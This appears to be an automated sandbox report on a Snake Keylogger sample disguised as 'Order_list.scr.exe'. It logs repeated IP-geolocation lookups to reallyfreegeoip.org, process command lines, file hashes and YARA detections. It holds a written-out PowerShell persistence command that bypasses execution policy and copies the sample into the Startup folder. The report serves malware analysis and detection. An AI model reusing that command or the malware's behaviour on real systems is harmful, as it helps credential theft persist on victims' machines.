                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2039&min_rtt=2025&rtt_var=769&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1441975&cwnd=168&unsent_bytes=0&cid=cbecb7231ad04af6&ts=144&x=0"
                                                                                                                          2025-01-13 09:12:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.449759104.21.64.14436256C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 09:12:23 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-13 09:12:23 UTC862INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:23 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 2074332
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ee2T%2BmqhSlYFNVFVMRTTP8%2B8j3OKNJgbIUNwS8MuHb34Sx9%2F4b7z15NZxghA%2BFRPrLVT1sx%2FO%2B2hw4rY3pOs7AK0oCeBLJYVYFpsixHFGwNZq4TkAg6nnwBJ8Y9zmpMvkr5eHt3L"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 901443a879fb42e9-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1614&rtt_var=628&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1709601&cwnd=240&unsent_bytes=0&cid=dc29bf3a07cecf9c&ts=1099&x=0"
                                                                                                                          2025-01-13 09:12:23 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.449762104.21.64.14436256C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 09:12:25 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-13 09:12:25 UTC859INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:25 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 2074334
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nmWQ%2FZb58Awxxg7ZGjJizV9Id6kcQKG5rXiXFaFKyZKTWxfvUxc9d0%2BLGBQCAiFL0t3%2BOe2szCouYBEw5TUsBuwLPdSpQPFpQNgMuCehhmY2QB1YJ9n0CtRI1Rh%2FTO%2FCH2GWfRS5"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 901443b5bc4e7c6a-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1970&rtt_var=744&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1464393&cwnd=218&unsent_bytes=0&cid=8fc08793b912593f&ts=132&x=0"
                                                                                                                          2025-01-13 09:12:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.449764104.21.64.14436256C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 09:12:26 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-13 09:12:26 UTC863INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:26 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 2074335
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wcWfsBlWsu%2FcnzZIL1Y158Y%2Fn%2FhS5VW%2B%2FAUSuhyp5R2O0j5xay59ac5%2FnlnUN3meSY%2BSy1YNl78vt85SoPfWfsIGGfhg4d5Nkad8GPn61HrLNpEFj42JpaoMZl6LlUaHYOiPQn4O"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 901443bdaa624414-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1594&rtt_var=615&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1753753&cwnd=180&unsent_bytes=0&cid=7c3c7a5c11aa086f&ts=127&x=0"
                                                                                                                          2025-01-13 09:12:26 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.449766104.21.64.14436256C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 09:12:27 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-13 09:12:27 UTC861INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:27 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 2074337
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MLNWWZwNA3%2BlIbNBoNP%2B8XLA%2F2HPh29l5tnlEPb9UQ3BQOtgFvVB4QTJYkAUzG9Z%2Fat9ks5olAEUHnPAwbIIob9KysP%2BBbAm7XZ7OhJMPXOelHJvQRATyUsQtqF963QFSSFjAHm%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 901443c6abcf42e9-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1745&min_rtt=1741&rtt_var=662&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1643218&cwnd=240&unsent_bytes=0&cid=887a4d96c1bb1e3f&ts=135&x=0"
                                                                                                                          2025-01-13 09:12:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.449768104.21.64.14436256C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 09:12:29 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-13 09:12:29 UTC855INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:29 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 2074338
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VT6XFULVmkDfAIhF1KEDnUVqvvtqGYtaspjB%2BshUAOHow8pZLJf3ZxafFmMqPKA2dDHRVZJfP4Ovm452U6kjcauzJl4i5OoBNcBV2qOhw%2FMHrwh42xKE8y5cuUU7wI5%2FNu5eW2ol"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 901443cede814414-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1666&rtt_var=632&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1721698&cwnd=180&unsent_bytes=0&cid=6c2929b12a5741b3&ts=137&x=0"
                                                                                                                          2025-01-13 09:12:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.449770104.21.64.14436256C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 09:12:30 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-13 09:12:30 UTC855INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:30 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 2074339
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lukAFSvPapJZy4PkThVutNlEwVbVIuNCJIn4jPY%2FvwXNgrtNLxV1MoPXIRD96DOAtSqeiHRBCc3lHDUC7ujBWC%2FFe7O4rR04kvSaDiEeQXEkGXisrYDL2%2ByTuRAOHT7kikTW0h6B"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 901443d72cdc8ca1-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=2026&rtt_var=773&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1403846&cwnd=168&unsent_bytes=0&cid=87a824b0204cef66&ts=156&x=0"
                                                                                                                          2025-01-13 09:12:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:04:12:01
                                                                                                                          Start date:13/01/2025
                                                                                                                          Path:C:\Users\user\Desktop\Order_list.scr.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\Order_list.scr.exe"
                                                                                                                          Imagebase:0x240000
                                                                                                                          File size:829'952 bytes
                                                                                                                          MD5 hash:F614CD44A2CA0676523D3F9D23AE23B2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000000.00000002.4170463364.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.4164055265.0000000003711000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Target ID:1
                                                                                                                          Start time:04:12:02
                                                                                                                          Start date:13/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'
                                                                                                                          Imagebase:0x240000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:2
                                                                                                                          Start time:04:12:02
                                                                                                                          Start date:13/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:3
                                                                                                                          Start time:04:12:03
                                                                                                                          Start date:13/01/2025
                                                                                                                          Path:C:\Users\user\Desktop\Order_list.scr.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\Order_list.scr.exe"
                                                                                                                          Imagebase:0xf80000
                                                                                                                          File size:829'952 bytes
                                                                                                                          MD5 hash:F614CD44A2CA0676523D3F9D23AE23B2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4141697018.000000000348B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4141697018.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Target ID:4
                                                                                                                          Start time:04:12:03
                                                                                                                          Start date:13/01/2025
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                          Imagebase:0x7ff6eef20000
                                                                                                                          File size:55'320 bytes
                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:5
                                                                                                                          Start time:04:12:15
                                                                                                                          Start date:13/01/2025
                                                                                                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"
                                                                                                                          Imagebase:0x4f0000
                                                                                                                          File size:829'952 bytes
                                                                                                                          MD5 hash:F614CD44A2CA0676523D3F9D23AE23B2
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4161249755.0000000003A34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.4161249755.0000000003A34000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
